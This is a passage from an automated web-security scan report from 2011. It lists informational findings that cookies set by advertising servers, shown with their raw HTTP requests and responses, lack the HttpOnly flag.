14.188. http://r1-ads.ace.advertising.com/site=793631/size=160600/u=2/bnum=63830787/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=793631/size=160600/u=2/bnum=63830787/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=793631/size=160600/u=2/bnum=63830787/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1061515.793631.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:11:39 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 697
Date: Mon, 03 Oct 2011 00:11:38 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:11:39 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<!-- PubMatic ad tag (Javascript) : Travelocity_160X600_ATF | http:\/\/www.Travelocity.com | 160 x 600 Wide Skyscraper | Advertising.Com Fixed 3\/24 -->\r\n<script type="text\/javasc
...[SNIP]...
14.189. http://r1-ads.ace.advertising.com/site=793631/size=160600/u=2/bnum=74948035/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=793631/size=160600/u=2/bnum=74948035/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=793631/size=160600/u=2/bnum=74948035/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1061515.793631.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:06 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 697
Date: Mon, 03 Oct 2011 00:09:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:09:06 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<!-- PubMatic ad tag (Javascript) : Travelocity_160X600_ATF | http:\/\/www.Travelocity.com | 160 x 600 Wide Skyscraper | Advertising.Com Fixed 3\/24 -->\r\n<script type="text\/javasc
...[SNIP]...
14.190. http://r1-ads.ace.advertising.com/site=793633/size=728090/u=2/bnum=55878431/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=793633/size=728090/u=2/bnum=55878431/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=793633/size=728090/u=2/bnum=55878431/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1061516.793633.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:06 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 690
Date: Mon, 03 Oct 2011 00:09:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:09:06 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<!-- PubMatic ad tag (Javascript) : Travelocity_728X90_ATF | http:\/\/www.Travelocity.com | 728 x 90 Leaderboard | Advertising.Com Fixed 3\/24 -->\r\n<script type="text\/javascript">
...[SNIP]...
14.191. http://r1-ads.ace.advertising.com/site=797434/size=300250/u=2/bnum=24812117/hr=20/hl=8/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.igougo.com%252Fabout%252F  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=797434/size=300250/u=2/bnum=24812117/hr=20/hl=8/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.igougo.com%252Fabout%252F

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=797434/size=300250/u=2/bnum=24812117/hr=20/hl=8/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.igougo.com%252Fabout%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.971432.797434.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 01:53:07 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 687
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 01:53:07 GMT
Connection: close
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 01:53:07 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<!-- PubMatic ad tag (Javascript) : igougo_300X250_ATF | http:\/\/www.igougo.com | 300 x 250 Medium Rectangle | Advertising.com - Indirect -->\r\n<script type="text\/javascript">\r\n
...[SNIP]...
14.192. http://r1-ads.ace.advertising.com/site=812162/size=160600/u=2/bnum=34930016/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=812162/size=160600/u=2/bnum=34930016/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=812162/size=160600/u=2/bnum=34930016/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1072156.812162.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:12:16 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 603
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:12:15 GMT
Connection: close
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:12:16 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4359.advertising.comOX2601/B5797640.2;sz=160x600;click=http://r1-ads.ace.advertising.com/click/site=0000812162/mn
...[SNIP]...
14.193. http://r1-ads.ace.advertising.com/site=812162/size=160600/u=2/bnum=78334226/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=812162/size=160600/u=2/bnum=78334226/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=812162/size=160600/u=2/bnum=78334226/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1072156.812162.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:08 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 603
Date: Mon, 03 Oct 2011 00:09:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:09:08 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4359.advertising.comOX2601/B5797640.2;sz=160x600;click=http://r1-ads.ace.advertising.com/click/site=0000812162/mn
...[SNIP]...
14.194. http://r1-ads.ace.advertising.com/site=812164/size=728090/u=2/bnum=23819479/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=812164/size=728090/u=2/bnum=23819479/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=812164/size=728090/u=2/bnum=23819479/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.915323.812164.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:08 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 595
Date: Mon, 03 Oct 2011 00:09:08 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:09:08 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3285.advertisingcom/B2343920.49;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000812164/mnum=0000
...[SNIP]...
14.195. http://rs.gwallet.com/r1/pixel/x1743  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x1743

Issue detail

